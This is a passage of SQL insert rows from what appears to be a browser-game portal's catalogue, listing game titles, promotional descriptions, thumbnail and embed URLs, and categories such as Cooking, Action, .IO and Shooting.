(313, 'Idle Restaurant Tycoon', 'Do you want to be a unique restaurant manager? You can learn how to be a manager with the Idle Restaurant game. You may need some experts for cooking and serving. Hire a master chef, develop your staff, manage your finances and become the perfect boss. Also, dont forget to check your market for surprise gifts. You can play Idle Restaurant Tycoon in a simple way without the need to constantly click.', 'https://img.gamemonetize.com/znokgo6d1qsz3pwqoy5t43wf95aque88/512x384.jpg', 'https://html5.gamemonetize.com/znokgo6d1qsz3pwqoy5t43wf95aque88/', '0', 'Cooking', 0, 0, '', 0, ''),
(314, 'Speedy Bartender', 'Step into the fast-paced world of a master mixologist in Speedy Bartender, a thrilling arcade game where quenching thirst meets adrenaline pumping action! Thirsty customers line the bar, their eyes pleading for a taste of your liquid artistry. Will you be the hero who delivers the perfect pour, or will frustration bubble over with spilled drinks and disappointed sighs?', 'https://img.gamemonetize.com/tevy36r7qnipasd04yrutfp3jaikpo1v/512x384.jpg', 'https://html5.gamemonetize.com/tevy36r7qnipasd04yrutfp3jaikpo1v/', '0', 'Cooking', 0, 0, '', 0, ''),
(315, 'Bakery Chefs Shop', 'Bakery Chefs Shop is a delicious and fun cooking adventure game for girls and kids. You are a talented cook who has many loyal customers in your 2D cartoon bakery. You can make orders and learn how to bake a cake in 60 levels. You can also decorate your cakes with extra items that you can unlock with gold coins. You have to serve the order well to get all 3 yellow stars and more bonus coins. Have a blast baking cakes!', 'https://img.gamemonetize.com/9cn5c1omowu3y2t8qn65vuwhci3srppz/512x384.jpg', 'https://html5.gamemonetize.com/9cn5c1omowu3y2t8qn65vuwhci3srppz/', '0', 'Cooking', 0, 0, '', 0, ''),
(316, 'Sweet Cotton Candy Maker', 'Blue, pink, yellow, white, wow! Marshmallows have many amazing colors and flavors. You can create your own marshmallows anytime. In cotton candy manufacturers, grab your candy and add your favorite flavor to make yummy desserts. The machine is hot and waiting for you! This dessert is easy to make, and you will be a professional soon. Mix your sugar and pick yours. There are many options to try, so let&amp;rsquo;s cook!', 'https://img.gamemonetize.com/duay2vzk328wwhrufwowb0gy5nlqvql2/512x384.jpg', 'https://html5.gamemonetize.com/duay2vzk328wwhrufwowb0gy5nlqvql2/', '0', 'Cooking', 0, 0, '', 0, ''),
(318, 'Pizza Cafe Tycoon', 'Are you ready to build a successful cafe empire with you? You currently own a pizza shop and customers love their delicious pizza. Your task is to deliver various pizza orders on time and quickly. Remember, speed and quality are everything in the cafe business. You have to work with dedication to ensure the satisfaction of your customers. Manage orders quickly and effectively without slowing down and offer your customers an unforgettable experience. Build your own strategies for success in your cafe empire and seize opportunities to grow your business.', 'https://img.gamemonetize.com/ozrihsbvi9tirbdb9cnyu7rks1ydj8hc/512x384.jpg', 'https://html5.gamemonetize.com/ozrihsbvi9tirbdb9cnyu7rks1ydj8hc/', '0', 'Cooking', 0, 0, '', 0, ''),
(319, 'Cooking Trendy', 'Do you want your food to bring joy to everyone? Theres nothing better than cooking in your own restaurant.Let Cooking Trend make your dreams come true ??When playing Cooking Trend, you will transform into a famous chef, creating delicious dishes to satisfy diners every day.Not only that, you will receive attractive rewards after completing each mission and use them to upgrade items, build your own restaurant.', 'https://img.gamemonetize.com/docrms4jca8iu8kndsglrihp3ihf3xh8/512x384.jpg', 'https://html5.gamemonetize.com/docrms4jca8iu8kndsglrihp3ihf3xh8/', '0', 'Cooking', 0, 0, '', 0, ''),
(321, 'Monster Truck Extreme Stunts', 'Monster Truck Extreme Stunts takes you on an electrifying ride through epic arenas filled with ramps, loops, and daring obstacles. Unleash massive power as you perform jaw-dropping flips, jumps, and tricks. Show off your stunt skills, crush everything in your path, and conquer every extreme course in this high-octane thrill ride! Web Dev &lt;a href=\'https://www.crazygamesx.com/\'&gt;https://www.crazygamesx.com/&lt;/a&gt;', 'https://img.gamemonetize.com/v4n2fp1keev6q4w8tih0rcxgo0czdaf8/512x384.jpg', 'https://html5.gamemonetize.com/v4n2fp1keev6q4w8tih0rcxgo0czdaf8/', '0', 'Action', 0, 0, '', 0, ''),
(322, 'Cargo Truck Montain Simulator', 'Cargo Truck Mountain Simulator is an immersive driving game that puts you in the drivers seat of a powerful cargo truck, navigating rugged mountain terrain. Your goal is to transport heavy loads across treacherous roads, steep inclines, and unpredictable weather conditions. With realistic physics, dynamic weather, and challenging landscapes. Web Dev &lt;a href=\'https://www.funcrazygames.com/\'&gt;https://www.funcrazygames.com/&lt;/a&gt;', 'https://img.gamemonetize.com/dua7f3lyka1ousc42knq5s53pggj2011/512x384.jpg', 'https://html5.gamemonetize.com/dua7f3lyka1ousc42knq5s53pggj2011/', '0', 'Action', 0, 0, '', 0, ''),
(323, 'American City Truck Transporting', 'American City Truck Transporting by BestCrazyGames offers thrilling cargo delivery missions through bustling urban landscapes. Navigate challenging roads, manage various trucks, and experience realistic driving gameplay in this action-packed transport game. Web Dev &lt;a href=\'https://www.kizi10.org/\'&gt;https://www.kizi10.org/&lt;/a&gt;', 'https://img.gamemonetize.com/1nsf9mo5viy91o3xbwdrl6u2yhn5i5o0/512x384.jpg', 'https://html5.gamemonetize.com/1nsf9mo5viy91o3xbwdrl6u2yhn5i5o0/', '0', 'Action', 0, 0, '', 0, ''),
(324, 'Offroad Driving Truck Transport', 'Offroad Driving Truck Transport is a thrilling adventure where you navigate rugged terrains, muddy paths, and steep hills. Take control of powerful trucks and transport heavy cargo across challenging off-road landscapes. Master your driving skills, overcome obstacles, and feel the adrenaline rush in this ultimate off-road trucking experience! Web Dev &lt;a href=\'https://www.crazygamesonline.com/\'&gt;https://www.crazygamesonline.com/&lt;/a&gt;', 'https://img.gamemonetize.com/4bk844pemos2hamkblsoxh01dzxbqm3h/512x384.jpg', 'https://html5.gamemonetize.com/4bk844pemos2hamkblsoxh01dzxbqm3h/', '0', 'Action', 0, 0, '', 0, ''),
(325, 'Plane Crash Ragdoll Simulator', 'As a fearless pilot, your mission is simple: survive a relentless onslaught of rockets targeting your aircraft. But dont be fooled by how easy it looks. Youll feel the rush of adrenaline as you fire rockets at your enemies and fly through dangerous skies! Features: - Many Game Modes: Avoid Rockets, Destroy Enemies and Low Fuel Landing! - Variety of Aircraft: from planes to helicopters - Customizable Skins: unlock various skins for character and aircraft - Realistic Physics &amp;amp; Ragdoll Pilot! - Challenging Levels and Scenarios', 'https://img.gamemonetize.com/9vz6x0b5dmyk48s8nalz74iupnzh3tyq/512x384.jpg', 'https://html5.gamemonetize.com/9vz6x0b5dmyk48s8nalz74iupnzh3tyq/', '0', 'Action', 0, 0, '', 0, ''),
(326, 'Transport Army vehicle truck driving', 'Transport vital supplies across rugged terrain, navigating through enemy territory and dangerous landscapes. Complete challenging missions, dodge roadblocks, and upgrade your vehicles armor and speed to overcome obstacles. With realistic controls, customizable trucks, and immersive levels, only the best drivers will lead their convoy to success. Prepare to rev up, strategize, and master the art of military transport in the ultimate army truck driving experience! Web Dev &lt;a href=\'https://www.insanegamesonline.com/\'&gt;https://www.insanegamesonline.com/&lt;/a&gt;', 'https://img.gamemonetize.com/bi51p6ugftg8ngxfz4x18hw50jskk0fy/512x384.jpg', 'https://html5.gamemonetize.com/bi51p6ugftg8ngxfz4x18hw50jskk0fy/', '0', 'Action', 0, 0, '', 0, ''),
(327, 'Oil Tank Truck Driving Sim', 'Oil Tank Truck Driving Sim offers a realistic experience of transporting oil across diverse terrains, featuring authentic physics and traffic scenarios. While it provides an immersive trucking experience, similar games like Oil Tanker Truck Drive and Oil Truck Games: Driving Games also offer comparable gameplay elements. Web Dev &lt;a href=\'https://www.crazygamesx.com/\'&gt;https://www.crazygamesx.com/&lt;/a&gt;', 'https://img.gamemonetize.com/9u4hs7eoy90iuifdvh89k5l5h60x0tab/512x384.jpg', 'https://html5.gamemonetize.com/9u4hs7eoy90iuifdvh89k5l5h60x0tab/', '0', 'Action', 0, 0, '', 0, ''),
(328, 'Truck Driving Construction Transport', 'The player takes on the role of a skilled truck driver in the construction transport industry. The objective is to navigate various terrains, loading essential construction materials and equipment onto the truck, then driving carefully to the designated construction site. Challenges include maneuvering through traffic, avoiding hazards, and meeting strict delivery times. Web Dev &lt;a href=\'https://www.crazygamesonline.com/\'&gt;https://www.crazygamesonline.com/&lt;/a&gt;', 'https://img.gamemonetize.com/fhqjmji6kcucsvwoaplxbtfxoqpya1pz/512x384.jpg', 'https://html5.gamemonetize.com/fhqjmji6kcucsvwoaplxbtfxoqpya1pz/', '0', 'Action', 0, 0, '', 0, ''),
(330, 'Animate.Space Create Animated GIF!', 'Animate.Space is a game where you can create cartoons, GIFs, and flipbooks directly in your browser. With almost unlimited frames and a variety of drawing tools (paint bucket, eraser, pixel and vector shapes), you can bring your ideas to life through frame-by-frame animation. Easily manage frames (copy, paste, delete), select, move, rotate, resize objects, and undo actions without limits. Save your projects as animated GIFs or share them online, while features like autoframe drawing, ghost preview, and line control help you create smooth, professional-looking animations. No watermarks, no sign-up required &amp;mdash; just pure creativity!', 'https://img.gamemonetize.com/zvluq2l3w4mxywskmoca63u5mm21uvd6/512x384.jpg', 'https://html5.gamemonetize.com/zvluq2l3w4mxywskmoca63u5mm21uvd6/', '0', 'Action', 0, 0, '', 0, ''),
(331, 'Angry Checkers', 'Common checkers are boring? Try angry checkers! Try to beat enemy checkers out of the board. there are 3 game modes. 1. Multiplayer - you play versus another random player via internet. 2. Single Player - you play versus AI. 3. Hot Seat - you play versus your friend on the same device.', 'https://img.gamemonetize.com/skma0pcrooj5rpuhitzk7etjqfsctr3l/512x384.jpg', 'https://html5.gamemonetize.com/skma0pcrooj5rpuhitzk7etjqfsctr3l/', '0', '.IO', 0, 0, '', 0, ''),
(332, 'Inky Snakes', 'Paper snakes is slithering io snake game with a touch of paper theme, there is only one rule to play game. Eat others to grow bigger. Choose awesome snakes and join the battle. Good Luck', 'https://img.gamemonetize.com/5s5zgsz0oejgblg3h7a8ycib7u1cwtg1/512x384.jpg', 'https://html5.gamemonetize.com/5s5zgsz0oejgblg3h7a8ycib7u1cwtg1/', '0', '.IO', 0, 0, '', 0, ''),
(333, 'Bump.iо', 'There are 16 cars are involved in competition.you must avoid collisions with monsters and boundaries for win.Impact vehicles get energy and Kill vehicles to get volume growth.', 'https://img.gamemonetize.com/6cxdgtbrdiyailrdq4v55g5pyfgfu3e1/512x384.jpg', 'https://html5.gamemonetize.com/6cxdgtbrdiyailrdq4v55g5pyfgfu3e1/', '0', '.IO', 0, 0, '', 0, ''),
(334, 'Shark Attack', 'Try to become the biggest shark on the server in this fun online .io game.', 'https://img.gamemonetize.com/4pf45zrkuykkl00bji0x8owfj6w4ia9m/512x384.jpg', 'https://html5.gamemonetize.com/4pf45zrkuykkl00bji0x8owfj6w4ia9m/', '0', '.IO', 0, 0, '', 0, ''),
(335, 'Penguin.io', 'Penguins at the North pole is never boring, they are constantly busy with something, it can be a search for food, various games, rest or struggle for survival on an ice floe. The latter seems to be a game, but we would call it a game with death. Why so, and not otherwise, it is difficult to answer, one thing is clear-the one who will survive in the game Penguin.IO, the will become the most popular penguin in pack of.', 'https://img.gamemonetize.com/t0uytaxwffwixwvylg3ulcaeoidyilkb/512x384.jpg', 'https://html5.gamemonetize.com/t0uytaxwffwixwvylg3ulcaeoidyilkb/', '0', '.IO', 0, 0, '', 0, ''),
(336, 'Bigmonsterz.io', 'Bigmonsterz.io-Hop into a vast world filled with weak and strong monsters,you start out as the weakest of the bunch,try and work your way to the very top and become the Biggest Monsterz in the Big mon world', 'https://img.gamemonetize.com/if6cwng6pkjl3a9fztj6lsbii2klh6lz/512x384.jpg', 'https://html5.gamemonetize.com/if6cwng6pkjl3a9fztj6lsbii2klh6lz/', '0', '.IO', 0, 0, '', 0, ''),
(337, 'Airplane IO', 'Airplan io is an online game that you can play for free Airplan Io is a fun game suitable for all ages The operation of the game is very simple You just need to control your airplan to move on the map Absorb the energy points on the map to make you stronger Be careful not to hit your enemy or you will lose the game Have fun playing with Airplanio', 'https://img.gamemonetize.com/1i9ar314046uj5v6p91kcl8em378zm60/512x384.jpg', 'https://html5.gamemonetize.com/1i9ar314046uj5v6p91kcl8em378zm60/', '0', '.IO', 0, 0, '', 0, ''),
(338, 'SnowFight.io', 'Snowfight.io is a massive snow fight. Join the massive multiplayer snow fight! Increase the size of the snowball and hit them on the opponents to shake them off the playing field.', 'https://img.gamemonetize.com/q2ibbexftbhzlrxex57ka753iss1ub7l/512x384.jpg', 'https://html5.gamemonetize.com/q2ibbexftbhzlrxex57ka753iss1ub7l/', '0', '.IO', 0, 0, '', 0, ''),
(339, 'Snaker.io', 'Snaker.io is addictive online io game! Enter the arena and face the other snakes in a fierce battle. Eat all energy in sight with your snake and grow it to win ! Show off who is the biggest snake in town!', 'https://img.gamemonetize.com/o34kce319kqqcdxpqyl4wso901bg8shw/512x384.jpg', 'https://html5.gamemonetize.com/o34kce319kqqcdxpqyl4wso901bg8shw/', '0', '.IO', 0, 0, '', 0, ''),
(340, 'TrafficControl.io', 'In TrafficControl.io you must prevent crashes. You can stop and start cars by clicking on them. The game is quite complicated in a few seconds.', 'https://img.gamemonetize.com/06oinnoyf1peegouc6y3pei8gy61lnkl/512x384.jpg', 'https://html5.gamemonetize.com/06oinnoyf1peegouc6y3pei8gy61lnkl/', '0', '.IO', 0, 0, '', 0, ''),
(341, 'PenguinBattle.io', 'PenguinBattle.io is fun addictive hyper casual io game. you control a little penguin with which you are fighting on the iceberg. Your task will be to push the other penguins out of this iceberg. If you stay as the last, you win. It is such an ice battle royale where the last living penguin wins. Parts of the iceberg fall off every few seconds.', 'https://img.gamemonetize.com/7a16ggvy580xb8s6kw95yr88548r5crc/512x384.jpg', 'https://html5.gamemonetize.com/7a16ggvy580xb8s6kw95yr88548r5crc/', '0', '.IO', 0, 0, '', 0, ''),
(343, 'Super Mario World 2', '<p>Super Mario World 2: Yoshi\'s Island Sūpā Mario: Yosshī Airando?, \'Super Mario: Yoshi\'s Island\')[2] is a platform video game developed and published by Nintendo for the Super Family Computer/SNES console. Despite its North American and European title, this game serves as a prequel to all other games within the established Mario Bros. timeline. While featuring Nintendo\'s trademark Mario character, the game\'s graphics and gameplay differed from all previous Mario games in that players control various Yoshi dinosaurs rather than Mario himself, who appears as a helpless infant. Yoshi\'s Island was released on August 5, 1995 in Japan, October 4, 1995 in North America and October 6, 1995 in Europe. A port was made for the Game Boy Advance as Super Mario Advance 3: Yoshi Island + Mario Brothers Sūpā Mario Adobansu Surī: Yosshī Airando Purasu Mario Burazāzu?) in Japan and as Yoshi\'s Island: Super Mario Advance 3 in other countries. The original version has yet to be announced to be ported for the Virtual Console. However the Game Boy Advance version was made available free for download to those who had purchased a Nintendo 3DS system before August 2011. A sequel for the Nintendo DS, Yoshi\'s Island DS, was released in 2006. Yoshi\'s Island was released to overwhelmingly positive reviews, selling about 4,000,000 copies after release.[3] During the Nintendo Direct on February 13, 2014, Nintendo announced Super Mario Advance 3: Yoshi’s Island would be among the first three Game Boy Advance games to be released on the Nintendo Wii U eShop in the United States.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/mario2.png', 'https://supernintendoemulator.com/game/?game=SMW2_-_New_Yoshi_s_Island', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(344, 'Street Fighter II Turbo Hyper Fighting', '<p>Street Fighter II Turbo: Hyper Fighting is a competitive fighting game released for the arcades by Capcom in 1992. It is the third game in the Street Fighter II sub-series of Street Fighter games following Street Fighter II : Champion Edition. Released less than a year after the previous installment, Hyper Fighting introduced a faster playing speed and new special moves for certain characters, as well as further refinement to the character balance. Hyper Fighting was the final arcade game in the Street Fighter II series to utilize the CP System hardware. The next game in the series, Super Street Fighter II, switched to the CP System II hardware.</p><p>How to play:</p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left</p><p>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button</p><p>Q = L Button<br>E = R Button</p><p>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/street.png', 'https://supernintendoemulator.com/game/?game=Street_Fighter_II_Turbo_-_Hyper_Fighting', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(345, 'Jungle Book', '<p><strong>The Jungle Book game:</strong><br>Based on the famous animated movie, Walt Disney’s The Jungle Book is a platform game where you control Mowgli, the boy who was raised by wild animals deep in the jungles. Your goal is to find the human village so you may you join your kin once again.</p><p>The player controls Mowgli, a young boy who has been raised by wolves. Mowgli must leave his home in the jungle and go back to the human village because Shere Khan, a tiger, is now hunting him. Mowgli must fight jungle wildlife and ultimately Shere Khan himself to reach his village. During the journey he meets Bagheera, Baloo, King Louie, the hypnotist snake Kaa, as well as the evil Shere Kh</p>', 'https://yassi.xyz/book/jungle.png', 'https://supernintendoemulator.com/game/?game=Jungle_Book', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(346, 'Broken Cars Jigsaw', '<p>This is interesting jigsaw game with five images of broken cars. Choose your favorite image to start to play and choose with how many pieces you want to play in this puzzle game. Use mouse to drag the pieces and to put in right place.</p>', 'https://img.gamedistribution.com/d33bb69af77140c1aec9aacb8b2135db-512x384.jpeg', 'https://html5.gamedistribution.com/d33bb69af77140c1aec9aacb8b2135db/', 'Yes', 'Puzzle', 0, 0, '', 0, ''),
(347, 'Owl Memory', 'Owl Memory is a free online game from genre of memory and animal games. Flip the tiles and try to match them up in pairs. Pair up all the tiles to win. Try to complete the game in as few moves as possible! There are 4 levels. Use the mouse to click or tap the screen on the squares. Concentrate yourself and start playing. Enjoy!', 'https://img.gamedistribution.com/5a9f00f5cbd446939d19bcb48a581ad1-512x384.jpeg', 'https://html5.gamedistribution.com/5a9f00f5cbd446939d19bcb48a581ad1/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/5a9f00f5cbd446939d19bcb48a581ad1-1280x550.jpeg', 0, ''),
(348, 'Ninja Treasure Match 3', '<p>Ninja Treasure Match 3 is an online puzzle game that you can play for free. Easy to play. Help ninja to collect treasures by drawing a line with these same color games! Match 3 or more gems can be eliminated. More than 5 you can get bonus and extra time.</p>', 'https://img.gamedistribution.com/e89e6aed598648bf9b9dd3664178184a-512x384.jpeg', 'https://html5.gamedistribution.com/e89e6aed598648bf9b9dd3664178184a/', 'Yes', 'Puzzles', 0, 0, 'https://img.gamedistribution.com/e89e6aed598648bf9b9dd3664178184a-1280x550.jpeg', 0, ''),
(349, 'InsectAttack', 'Your mission is to block the insects before they hit the biker, just by touching the mouse or finger if you play from the mobile.', 'https://img.gamedistribution.com/6cadfa1ddced4b3981fa5e166aafebb3-512x384.jpeg', 'https://html5.gamedistribution.com/6cadfa1ddced4b3981fa5e166aafebb3/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/6cadfa1ddced4b3981fa5e166aafebb3-1280x550.jpeg', 0, ''),
(350, 'Scary House Clown Evil', 'Scary House Clown Evil is an Exciting Thriller 3D horror game, inspired by all horror films about the best serial killers in their creepy Mansion. You wake up and find yourself trapped inside a scary House with blood and dark feelings, with deadly silence and a dangerous clown murderer whos looking around for his next victim to kill. On Scary House Clown Evil horror game you have to Sneak with stealth and explore the scary Mansion, discover and escape rooms and find Every single key for each Room and watch out for the Creepy Clown killer, whos always so suspicious about an intruders presence Nobody escaped the dark pursuer. Dare you?', 'https://img.gamemonetize.com/44z7cekal1224m2ngzkxkekhgdmn001d/512x384.jpg', 'https://html5.gamemonetize.com/44z7cekal1224m2ngzkxkekhgdmn001d/', '0', 'Adventure', 0, 0, '', 0, ''),
(351, 'Adventure Home', 'Welcome to Adventure Home: Run Adventure, the ultimate mobile game that will take you on a thrilling journey of running, jumping, and treasure collecting! If you like genres such as adventure, action, rpg, platform, quests or just want to have a good time then this game is for you. Features of this game: High Quality graphics will leave only positive feedback Game size is minimal (but not compromised the graphics) and it is good for your device health Super simple controls make it easy to start playing Interesting quests will not let you get bored while playing the game', 'https://img.gamemonetize.com/6mw96kdp3ketqjyafnad8t2099h4z9tv/512x384.jpg', 'https://html5.gamemonetize.com/6mw96kdp3ketqjyafnad8t2099h4z9tv/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(352, 'Sweet Solve', 'Collect strawberry to the bucket using your brain This game consists of a challenge to collect strawberries in each level by solving the way to get it. Physics based game where you have to destroy blocks and make the way or progress so that strawberries can be collected easily. Think carefully before taking any steps. Either dropping strawberries or destroying them will be the game over. Don&amp;rsquo;t forget to collect stars. If you like genres such as puzzles, physics based games or just want to have a good time then this game is for you. Features of this game: High Quality graphics Game size is minimal Super simple controls Interesting Quests', 'https://img.gamemonetize.com/leiasg9oe4sc50inmnmdp4lg328pc5f5/512x384.jpg', 'https://html5.gamemonetize.com/leiasg9oe4sc50inmnmdp4lg328pc5f5/', '0', 'Puzzles', 0, 0, '', 0, ''),
(353, 'Stickman Night Survive', 'Now that Halloween is here, the gloomiest day of the year, its time to bring back the courageous white stickman who is an expert at vanquishing monsters. Stop procrastinating and start enjoying Stickman Night Survive right now on your preferred mobile device. Its a fun and free online game. Every living thing on Earth is frightened to death when monsters emerge from their underground lairs on Halloween night.', 'https://img.gamemonetize.com/zx1x0yknh5emq3mzop2fvbpimsxgpz9h/512x384.jpg', 'https://html5.gamemonetize.com/zx1x0yknh5emq3mzop2fvbpimsxgpz9h/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(354, 'BFFs Golden Hour', 'Get ready to conquer the fashion world with Fall Aesthetics! Travel the globe alongside our stylish crew and unlock your inner fashionista. Mix and match outfits inspired by the vibrant streets of New York, the golden sunsets of Tuscany, the mesmerizing festivals, the traditional beauty of Japan, and the enchanting charm of Scotland. With endless options for dressing up and a touch of wit and fun, Fall Aesthetics will keep you entertained for hours. Play now and let your fashion sense shine like never before!', 'https://img.gamemonetize.com/66m25m8w23jo0y0jrhb5g88188suqpwd/512x384.jpg', 'https://html5.gamemonetize.com/66m25m8w23jo0y0jrhb5g88188suqpwd/', '0', 'Girls', 0, 0, '', 0, ''),
(355, 'Fidget Trading Card Toy', 'Fidget Trading Card Toy is a fidget trading game that allows you to feel the fun of collecting toy cards! In the game, you will flip cards against opponents and even use the slap feature to set off a fierce trading duel! Your goal is to collect as many rare cards as possible, increase your card collection, and gain more advantages in trading!', 'https://img.gamemonetize.com/7zoawxqu9m4lg1d02ew9z3t7bmktj5bw/512x384.jpg', 'https://html5.gamemonetize.com/7zoawxqu9m4lg1d02ew9z3t7bmktj5bw/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(356, 'Hungry Crab', 'In &amp;ldquo;Hungry Crab&amp;rdquo; your objective is to guide the candy to the crab&amp;rsquo;s mouth by strategically cutting ropes while collecting the stars. Simply swipe your finger across the screen to cut the ropes to play. The candy will then be released and begin its descent toward the crab. However, you must be careful not to let the candy flow away. Features of this game: High Quality graphics will leave only positive feedback Game size is minimal (but not compromised the graphics) and it is good for your device health Super simple controls make it easy to start playing Interesting quests will not let you get bored while playing the game.', 'https://img.gamemonetize.com/sme8rz5qvjf5if0ss3nbztssufmikaoj/512x384.jpg', 'https://html5.gamemonetize.com/sme8rz5qvjf5if0ss3nbztssufmikaoj/', '0', 'Puzzles', 0, 0, '', 0, ''),
(357, 'Percys Froggy Frenzy', 'Jump into the vibrant world of Percys Froggy Frenzy! Guide Percy, a daring frog, through a non-stop adventure where he shoots bubbles. Move Percy left and right as he auto-fires bouncing shots to pop falling bubbles. Along the way, jump across dynamic platforming levels to gather even more coins, boosting Percy&amp;rsquo;s shooting speed, power, and health. Beware&amp;mdash;if Percy takes hits, maybe you&amp;rsquo;ll need to restart the level. With endless progression and varied challenges, this game is perfect for fans of fast-paced, action-packed platformers!', 'https://img.gamemonetize.com/1ye2ka2gz2m1wsy539bi6q5ev2eaqd96/512x384.jpg', 'https://html5.gamemonetize.com/1ye2ka2gz2m1wsy539bi6q5ev2eaqd96/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(358, 'Among Knights', 'Among Knights is an Adventure Arcade 2D Game that tells a wonderful story of an ancient war between Knights and mutants. Among Knights comes with easy and enjoyable gameplay in an amazing 2D environment, with several places following the story. the games story tells the destiny of a young Knight who was fated to revenge the death of his father and finds out some truth about the ancident. Dive into the story of Among Knights, with the young knight, and defeat some of those mutants in pursuit of their leaders who called the Giant Mutant! Theres plenty to find, but one misstep and its all over.', 'https://img.gamemonetize.com/7rqz6ji1okgid9e6zqt6jq7bc6wt3e2s/512x384.jpg', 'https://html5.gamemonetize.com/7rqz6ji1okgid9e6zqt6jq7bc6wt3e2s/', '0', 'Arcade', 0, 0, '', 0, ''),
(359, 'Heli Monsters Giant Hunter', '<p>&nbsp;Heli Monsters Ready to face html5 games the massive challenge? In Heli Monsters - Giant Hunter, you will face crazy monsters and begin an exciting shooting adventure! You will use your gun to aim at the monster and fight them. Your task is to destroy them and keep the city safe! Buy higher-damage guns and bullets with gold. Such as AWM, M200, M24, etc.</p>', 'https://img.gamemonetize.com/tloh1r8i3pywjg2n3wyemj2uqjlktcnj/512x384.jpg', 'https://html5.gamemonetize.com/tloh1r8i3pywjg2n3wyemj2uqjlktcnj/', 'Yes', 'Shooting', 0, 0, '', 0, ''),
(360, 'Ping Pong Battle Table Tennis', 'Want to have an intense table tennis battle? In Ping Pong Battle - Table Tennis, you will become a ping pong pro and compete with your opponents in a fierce competition! This game combines realistic paddle manipulation with exciting match simulation.', 'https://img.gamemonetize.com/80whi1rzhhbrxn1f4le2ll0cf5vx5wv2/512x384.jpg', 'https://html5.gamemonetize.com/80whi1rzhhbrxn1f4le2ll0cf5vx5wv2/', '0', 'Arcade', 0, 0, '', 0, ''),
(361, 'Astro Destroyer', 'Embark on an intergalactic journey with Astro Destroyer, a thrilling arcade-style space shooter where you pilot a futuristic spaceship through the vast expanse of space. Your mission is to destroy the endless waves of asteroids hurtling toward you while avoiding collisions and collecting power-ups to enhance your ship&amp;rsquo;s capabilities.', 'https://img.gamemonetize.com/fkl51gyhmd5ldbn918v8xs72gpaolbwn/512x384.jpg', 'https://html5.gamemonetize.com/fkl51gyhmd5ldbn918v8xs72gpaolbwn/', '0', 'Shooting', 0, 0, '', 0, ''),
(362, 'War Machine', 'You have to command a destructive weapon - a trebuchet. Find and attack weak points of fortifications. Destroy the enemy using various types of projectiles. Liberate your lands from the enemy hordes!', 'https://img.gamemonetize.com/6oksnxniq3756mkszruc2sj8f6oh6o80/512x384.jpg', 'https://html5.gamemonetize.com/6oksnxniq3756mkszruc2sj8f6oh6o80/', '0', 'Shooting', 0, 0, '', 0, ''),
(363, 'Dino Hide N Shoot', 'Do you want to begin a fun dinosaur-themed shooting game in Dino Hide N Shoot? Play a brave gunman on an exciting adventure! In this game, you will constantly run to avoid the attack of dinosaurs.And pick up the bullets, accumulate enough firepower. Pay attention to using the box as cover,seize the moment to shoot at the dinosaur! The gameplay is simple yet challenging.', 'https://img.gamemonetize.com/v95y3tnx0r9zhi5d47d10g3wkvr6d8s9/512x384.jpg', 'https://html5.gamemonetize.com/v95y3tnx0r9zhi5d47d10g3wkvr6d8s9/', '0', 'Shooting', 0, 0, '', 0, ''),
(364, 'Shoot Run Monster Hunting', 'Welcome to the interesting parkour world of Shoot Run: Monster Hunting! In this challenging game,you will be a brave shooter. Run, collect, fight and shoot all kinds of scary monsters, show your courage and skill! Enjoy running in a variety of scenarios, challenging speed and agility.', 'https://img.gamemonetize.com/y0w71ih9pfamj46q2kcmi17qk6kgnbd2/512x384.jpg', 'https://html5.gamemonetize.com/y0w71ih9pfamj46q2kcmi17qk6kgnbd2/', '0', 'Shooting', 0, 0, '', 0, ''),
(365, 'Alien Buster', 'Alien Buster is an adrenaline-fueled shooting game that pits players against a relentless alien invasion in a quest to save Earth. Equipped with an arsenal of futuristic weapons, players face off against waves of powerful extraterrestrial enemies across a variety of intense levels and visually stunning landscapes. Alien Buster is perfect for fans of space combat and shooter games, offering hours of thrilling gameplay. Do you have what it takes to defend Earth and become the ultimate alien-bursting hero? Download Alien Buster today and join the battle!', 'https://img.gamemonetize.com/xvuzcyxxdd4wtc95j2kxe6afp4tppwio/512x384.jpg', 'https://html5.gamemonetize.com/xvuzcyxxdd4wtc95j2kxe6afp4tppwio/', '0', 'Shooting', 0, 0, '', 0, ''),
(366, 'HALLOWEEN 2024 FPS SHOOTER', 'HALLOWEEN 2024 FPS SHOOTER is an exciting and free-to-play first-person shooting game. Your mission is to shoot as many zombies as possible to unlock new levels. If you run out of bullets, search the ground for more ammo to keep going. Get ready for some spooky, action-packed fun!', 'https://img.gamemonetize.com/9ab396domiv6jz15oy33sy75i9j895ax/512x384.jpg', 'https://html5.gamemonetize.com/9ab396domiv6jz15oy33sy75i9j895ax/', '0', 'Shooting', 0, 0, '', 0, ''),
(367, 'Sniper Town', 'Welcome to Sniper Town, the ultimate gun shooting game! In this game, you play as a sniper on a mission to eliminate your enemies without being detected. Explore a variety of amazing and challenging levels, and strive to complete them all. Good luck!', 'https://img.gamemonetize.com/37bnymju4ipw3hmy0faa4jxk46r9pg32/512x384.jpg', 'https://html5.gamemonetize.com/37bnymju4ipw3hmy0faa4jxk46r9pg32/', '0', 'Shooting', 0, 0, '', 0, ''),
(368, 'Centipede Attack 2D ', 'This side-scrolling shooter offered players a unique and addictive gameplay experience that involved guiding a small bug through a maze of mushrooms, avoiding deadly centipedes While the Centipede game may seem old-fashioned by todays standards, it remains a timeless classic. Its innovative gameplay and addictive nature have cemented its place in gaming history', 'https://img.gamemonetize.com/qonrxxtprdpm1s2fwu5g3nkftrepjkdo/512x384.jpg', 'https://html5.gamemonetize.com/qonrxxtprdpm1s2fwu5g3nkftrepjkdo/', '0', 'Shooting', 0, 0, '', 0, ''),
